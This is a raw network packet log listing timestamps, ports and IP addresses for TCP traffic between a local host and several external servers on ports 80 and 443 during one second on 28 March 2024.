Mar 28, 2024 09:14:59.402172089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402216911 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.402216911 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.402924061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402954102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402971029 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402982950 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403002977 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403014898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403014898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403038979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403055906 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403069019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403069019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403110027 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403110027 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403400898 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.403419018 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.403465033 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.403490067 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.403825045 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403877974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403891087 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403908014 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403923035 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403950930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.403954029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403954983 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.403964996 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404005051 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.404005051 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.404019117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404308081 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.404761076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404777050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404846907 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.404846907 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.404871941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404886007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404897928 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404910088 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404933929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.404937029 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.404951096 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405684948 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.405702114 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.405725956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405725956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405745029 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.405759096 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.405767918 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405790091 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.405801058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405817986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.405822039 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405848026 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405857086 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.405889034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.405898094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.406668901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406734943 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.406793118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406806946 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406819105 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406831980 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406858921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.406858921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.406868935 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406907082 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.406907082 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.406924009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406974077 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.406992912 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407005072 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407013893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.407013893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.407047033 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407068014 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407079935 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407094002 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407118082 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407119989 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407134056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407154083 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407181978 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407187939 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407215118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407228947 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407243967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407258987 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407289982 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407295942 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407309055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407321930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407337904 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407361031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407377005 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407387972 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407399893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407407999 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407424927 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407438040 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407464027 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407469988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407485962 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407497883 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407499075 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407511950 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407529116 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407540083 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407553911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407582045 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407593012 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407618046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407634974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407644987 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407649994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407679081 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407695055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407704115 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407708883 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407721996 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407735109 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407744884 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407774925 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407777071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407789946 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407803059 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407816887 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407840967 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407861948 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407876015 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407903910 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407908916 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407943964 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407958031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407960892 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407974005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.407985926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.407988071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408014059 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408018112 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408036947 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408050060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408063889 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408080101 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408081055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408103943 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408119917 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408137083 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408148050 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408160925 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408173084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408174992 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408200979 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408211946 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.408233881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.408256054 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408257961 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.408281088 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.408281088 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.408289909 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.408302069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.408328056 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.408343077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.408355951 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.408373117 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.408396006 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.408406019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.408437967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408449888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.408469915 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408483982 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408508062 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408521891 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408538103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408550024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408562899 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408575058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408588886 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408613920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408615112 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408634901 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408641100 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408653975 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408668041 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408683062 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408699036 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408706903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408721924 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408734083 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408747911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408751011 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408776999 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408790112 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408814907 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408828020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408838987 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408842087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408858061 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408866882 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408879995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408894062 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408915997 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.408926010 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.408953905 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409044981 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409059048 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409097910 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409125090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409138918 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409164906 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409184933 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409200907 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409221888 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409235954 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409274101 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409277916 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409291983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409338951 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409339905 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409356117 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409369946 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409383059 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409399033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.409409046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409425020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409435034 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409439087 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409471035 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.409495115 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409498930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409512997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409517050 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409539938 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409554958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409569025 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409570932 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409583092 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409595966 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409607887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409625053 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409646988 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409657001 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409684896 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409692049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409698009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409710884 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.409735918 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409749985 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.409754992 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410557985 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410574913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410598993 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410614014 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410626888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410628080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.410644054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410656929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.410662889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.410662889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.410685062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.410720110 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.411437035 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.411480904 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.411495924 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.411523104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.411523104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.411582947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.411598921 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.411621094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.411621094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.411633015 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.411647081 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.411664963 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.411679983 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.413592100 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.413606882 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.413661003 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.413669109 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.414014101 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.414028883 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.414069891 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.414099932 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.414764881 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:59.414865971 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:59.414927959 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:59.416546106 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:59.416563034 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:59.420265913 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:59.420377970 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:59.420437098 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:59.422135115 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:59.422151089 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:59.423058033 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.423075914 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.423118114 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.423156977 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.424999952 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.425038099 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.425091028 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.432311058 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.432342052 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.432404995 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.436347961 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.436368942 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.436383009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.436398983 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.436412096 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.436464071 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.436464071 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.437398911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.437417030 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.437429905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.437437057 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.437448978 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.437474966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.437474966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.437621117 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.438473940 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438488960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438540936 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438555002 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438575983 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.438575983 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.438582897 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438597918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438625097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438637018 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.438637018 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.438695908 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.438929081 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.438941956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.439001083 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.439013958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.439017057 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.439028025 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.439059973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.439059973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.439070940 CET	80	49743	104.21.22.54	192.168.2.4
